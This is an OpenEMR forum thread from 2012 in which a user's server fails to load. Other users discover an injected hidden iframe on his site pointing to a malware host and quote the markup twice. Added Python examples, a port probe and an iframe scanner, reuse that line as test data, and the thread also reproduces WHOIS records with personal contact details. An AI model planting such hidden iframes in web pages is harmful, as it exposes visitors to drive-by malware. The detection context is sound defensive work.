Help! system is down

anonymous wrote on Sunday, January 29, 2012:

HI,

Thanks for all the great help in the past. If you go to my server now, all you get is a couple of symbols, no login screen. Here's an example:

http://emr4patients.com:8080/openemr_draskin

If I run it as localhost on the server itself it works fine.

I tried stopping and starting Apache and rebooting the Windows server it's hosted on; none of it helped.

Help!  Thanks!

juggernautsei wrote on Sunday, January 29, 2012:

Hi,

Did you open port 8080 on your firewall? This is the first thing that comes to my mind. If it is working fine locally, then the path to the outside is blocked. You can run Port Detective to see what ports you have opened to the web.

Sherwin,

aethelwulffe wrote on Sunday, January 29, 2012:

Actually, it looks like the server is there, just the directory location/vhosts etc… is wrong.
What kind of installation is this?
I noticed when logging into the domain name at port 8080 it DOES ask for a username and password, so it IS doing something, not just timing out.  Not meaning to ask a dumb question, but what changed?
There is a tiny possibility that if you truly didn’t do anything to your setup, and you have not been hacked, then your router COULD be *partially* screwing up resolving port 8080.  I HAVE seen that before.  Routers and switches are flaky things.  I would isolate/change the gear involved, or even load up a new or working backup install on another computer to test the system itself before digging into the software side of stuff.  Of course, you could just resolve to the domain name and use your login to see if you get index access to the server.  Do you have any other sites or applications on that server (sub domain or different domain name) that you can access?  Perhaps you can pop a page other than openEMR into the htdocs and test for access.

gutiersa wrote on Sunday, January 29, 2012:

What URL are you using to login from within the server itself:

Localhost
127.0.0.1
192.168.x.x
Or your actual wan IP address?
Or your domain name?

gutiersa wrote on Sunday, January 29, 2012:

Also try disabling your Windows firewall (on your server), then accessing your site from a local computer.
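The replies above work through the classic "works on localhost, fails from outside" split: a connection that times out points at a firewall or router dropping traffic on the way in, while one that is refused means the host was reached but nothing is listening on that port from that address. The following is an added example, not code from the OpenEMR project or from any of the posters, that turns that reasoning into a small diagnostic you run against your own server: `probe_port` classifies the outcome of a TCP connect, and `port_is_free` reports whether something else already owns a port (the kind of conflict described later in the thread). The `start_local_listener` helper is a constructed stand-in for a real service, used only so the functions can be exercised offline.

```python
import socket


def probe_port(host, port, timeout=3.0):
    """Classify reachability of host:port from this machine.

    Returns one of:
      'open'       - TCP handshake completed (something is listening and reachable)
      'refused'    - host reached, but nothing listening on that port/address
      'timeout'    - no answer at all: typically a firewall or router dropping packets
      'unresolved' - name did not resolve (DNS problem, not a server problem)
      'error'      - any other socket error (e.g. no route to host)
    """
    try:
        infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror:
        return "unresolved"
    family, socktype, proto, _, sockaddr = infos[0]
    with socket.socket(family, socktype, proto) as s:
        s.settimeout(timeout)
        try:
            s.connect(sockaddr)
            return "open"
        except ConnectionRefusedError:
            return "refused"
        except socket.timeout:
            return "timeout"
        except OSError:
            return "error"


def port_is_free(port, host="0.0.0.0"):
    """Return True if this process can bind host:port, i.e. no other local process owns it.

    A False result on the address your web server should use (while the web server
    is stopped) means another program has taken the port, which shows up to remote
    users as the wrong application answering, or no application at all.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind((host, port))
            return True
        except OSError:
            return False


def start_local_listener():
    """Constructed helper for demonstration: listen on 127.0.0.1 at an OS-chosen port.

    Returns (listening_socket, port). Close the socket when done.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s, s.getsockname()[1]


if __name__ == "__main__":
    # Demonstration against the constructed local listener; replace host/port
    # with your own server's address when diagnosing a real deployment.
    srv, port = start_local_listener()
    print("listener up:", probe_port("127.0.0.1", port))        # open
    print("port free while listening:", port_is_free(port, "127.0.0.1"))  # False
    srv.close()
    print("listener down:", probe_port("127.0.0.1", port))      # refused
```

Run `probe_port` from a machine on the LAN and again from outside; a LAN 'open' with an outside 'timeout' isolates the problem to the firewall or router, exactly the split the replies above are asking about, and a local `port_is_free` returning False with the web server stopped points at a port conflict instead.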

mike-h30 wrote on Sunday, January 29, 2012:

I get a warning that the subdomain (www.emr4patients.com) contains malware.  Here is a screen shot from my browser.

gutiersa wrote on Sunday, January 29, 2012:

Ok, we know you can disregard that because your server is yours and has no malware. So you can ignore the warning.
However, since your server is a Windows server, use IE, and tell me what you get when you use http://localhost/openemr/?site=yoursite

I will be online to help troubleshoot if you want.
Replace "yoursite" with "default" or the name of your site, depending on your setup, but do not post it here. Just tell me the result.

gutiersa wrote on Sunday, January 29, 2012:

Also:

Looks like you are trying to access your site from a Mac or Linux computer (maybe?).
Just let us start at the beginning. Start with the Windows server itself. If needed, email me at sourceforge.net.

aaversa wrote on Sunday, January 29, 2012:

Actually, I have to disagree here. The warning is from Google and should not be ignored. It is reporting that the site contains content from a known malware source (forghost.3322.org).

It’s quite possible that (if the original reporter is a legitimate user) his site has been compromised.

Aric Aversa
Health Care Technologies

aaversa wrote on Sunday, January 29, 2012:

Looking a little more closely, the main pages for this site (www.emr4doctors.com/www.emr4patients.com) also appear to have malicious code embedded. You can see that the code is causing the client browser to pull in content from the malware site:

</head>
<iframe src=http://forghost.3322.org/ghost/1/index.htm width=0 height=0></iframe>
<body ...

A quick check on Google shows this URL has been associated with a trojan horse.

OP - if you are a legitimate OpenEMR user, I strongly recommend you contact a qualified security consultant.

Aric Aversa
Health Care Technologies
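The injected `<iframe ... width=0 height=0>` quoted above is the signature of a drive-by injection: a frame the visitor never sees, sized to zero and pointing at a host that is not the site's own. As an added example (not code from the OpenEMR project or from any of the posters), the scanner below parses a page with the standard library's `html.parser` and flags iframes that are zero-sized, hidden by inline style, or sourced from a host other than the one you pass in. `SAMPLE_PAGE` is a constructed page that embeds the exact snippet quoted in the thread next to a benign same-site frame, so the two cases can be compared; the hostname `www.emr4patients.com` is taken from the thread and is only used as the "expected" host.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: the injected frame quoted in the thread (unquoted
# attribute values and all), followed by a legitimate same-site iframe.
SAMPLE_PAGE = """<html><head><title>EMR</title></head>
<iframe src=http://forghost.3322.org/ghost/1/index.htm width=0 height=0></iframe>
<body><p>Login</p>
<iframe src="/embed/calendar.html" width="400" height="300"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero(value):
    """True for width/height values like '0', '0px', ' 0 '."""
    v = value.strip().lower().rstrip("px").strip()
    try:
        return float(v) == 0
    except ValueError:
        return False


def find_suspicious_iframes(html, site_host):
    """Return [(src, [reasons...]), ...] for iframes that look injected.

    site_host is the hostname the page is legitimately served from; any frame
    whose src resolves to a different host is reported as external.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        host = urlparse(src).hostname  # None for relative URLs such as /embed/x.html
        if host and host.lower() != site_host.lower():
            reasons.append(f"external host {host}")
        if _is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", "")):
            reasons.append("zero-size frame")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via style")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, "www.emr4patients.com"):
        print(f"SUSPICIOUS iframe {src}: {', '.join(reasons)}")
```

Feed it the raw HTML of each public page (and any PHP or template file the web server serves) rather than a browser's rendered view, since injected markup often sits outside `<body>` exactly as in the quoted snippet. An external host by itself is only a triage signal (embedded maps or videos trip it too); zero size or hidden styling combined with an unfamiliar host is what deserves a cleanup and an investigation of how the file was modified.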

gutiersa wrote on Sunday, January 29, 2012:

Ok, then it's time to go back to the server and stay within the LAN.

anonymous wrote on Monday, January 30, 2012:

It might be the Free DNS we are using.

aaversa wrote on Monday, January 30, 2012:

Sorry, but I don’t think so. This looks like a classic example of a drive-by attack. Also, your “Free DNS” service 3322.org has a history of being used in these types of schemes.

Frankly, this is the 2nd thread in this forum where you’ve been notified of the malware warnings, and you are suspiciously unconcerned (https://sourceforge.net/projects/openemr/forums/forum/202506/topic/4503616?message=10944959).

In fact, I’d go so far as to caution others here to avoid this poster’s site(s) until this issue has been properly addressed. It would also be wise to run a malware scan if you visited any of the associated urls.

Aric Aversa
Health Care Technologies

mike-h30 wrote on Monday, January 30, 2012:

Can one of the mods (Brady, Rod, Tony) notify SourceForge and verify the credentials of the original poster? Aric brings up a good point:

** “this is the 2nd thread in this forum where you’ve been notified of the malware warnings, and you are suspiciously unconcerned (https://sourceforge.net/projects/openemr/forums/forum/202506/topic/4503616?message=10944959).”**

This poses a serious risk to the numerous and unsuspecting Windows users visiting this forum, especially those that have sensitive data like patient information on their Windows machines.

Mike

bradymiller wrote on Monday, January 30, 2012:

Hi,

For the sourceforge user, I only see: https://me.yahoo.com/a/0YPc1OBv
I do not know who this user is; however, Tony has referred to this user as Don in the past. It would be nice to get clarification that this user is known in the community so everybody isn't worried. If I can't get clarification or verify who this user is, then it's easy to delete the posts that contain the risky links.

-brady

bradymiller wrote on Tuesday, January 31, 2012:

Hi,
If I don't get confirmation on this user by tomorrow (either from the user themselves or somebody who knows this user), then I will delete the posts here that contain the apparent bad links.
thanks,
-brady

gutiersa wrote on Tuesday, January 31, 2012:

Here is info on the owner of emr4doctors.com, from godaddy.com:

Registrant:
Claims Tiger Software
Don Lewis
1481 Sequoia Dr
Hebron, KY 41048
US
Phone: +1.7027673136
Email: don@emr4doctors.com
Registrar Name….: Register.com
Registrar Whois…: whois.register.com
Registrar Homepage: www.register.com

Domain Name: emr4doctors.com
Created on……………: 2004-03-16
Expires on……………: 2012-03-16

Administrative Contact:
Morninglight Software
Don Lewis
8633 Portofino Ct
Las Vegas, Nv 89117
US
Phone: 1-702-8379291
Email: donelewis@lvcoxmail.com

Technical Contact:
Register.Com
Domain Registrar
575 8th Avenue 11th Floor
New York, NY 10018
US
Phone: 1-902-7492701
Email: domain-registrar@register.com

DNS Servers:
dns027.c.register.com
dns056.b.register.com
dns219.a.register.com
dns010.d.register.com

Visit AboutUs.org for more information about emr4doctors.com

AboutUs: emr4doctors.com

Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Creation Date: 16-MAR-2004
Updated Date: 14-MAR-2011
Expiration Date: 16-MAR-2012

Nameserver: DNS010.D.REGISTER.COM
Nameserver: DNS027.C.REGISTER.COM
Nameserver: DNS056.B.REGISTER.COM
Nameserver: DNS219.A.REGISTER.COM

Registry Status: ok

gutiersa wrote on Tuesday, January 31, 2012:

This shows up for emr4patients.com, also from godaddy.com:

WHOIS Information
Registrant
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
emr4patients.com@domainsbyproxy.com
Administrative Contact
Registration Private
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
emr4patients.com@domainsbyproxy.com
Technical Contact
Registration Private
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
emr4patients.com@domainsbyproxy.com
Registered Through
GoDaddy.com, LLC
Domain Name: emr4patients.com
Created on: 8/19/2007 6:24:30 PM
Expires on: 8/19/2012 6:24:30 PM
Last Updated on: 7/23/2011 8:18:15 AM
Domain Servers
NS1.AFRAID.ORG
NS2.AFRAID.ORG
NS3.AFRAID.ORG
NS4.AFRAID.ORG

drdonelewis wrote on Tuesday, January 31, 2012:

I did not know that my membership was not displaying my email or other information. Thanks for the phone call regarding my information. You're welcome to remove all of my posts and any code changes I suggested. We had a conflict with a webcam that was talking to port 8080; after all, it was not an outside threat. Thank you.

Don Lewis
800-758-9539
drwhiplash@yahoo.com

bradymiller wrote on Tuesday, January 31, 2012:

Hi Don,

There’s no reason to remove your posts if we know who you are. Just wanted to make sure an anonymous user wasn’t posting links to a malware site, which is not the case. What is going on with the issue that aaversa brought up above regarding the apparent code on your site:

</head>
<iframe src=http://forghost.3322.org/ghost/1/index.htm width=0 height=0></iframe>
<body ...

Are you able to remove this from your site?

-brady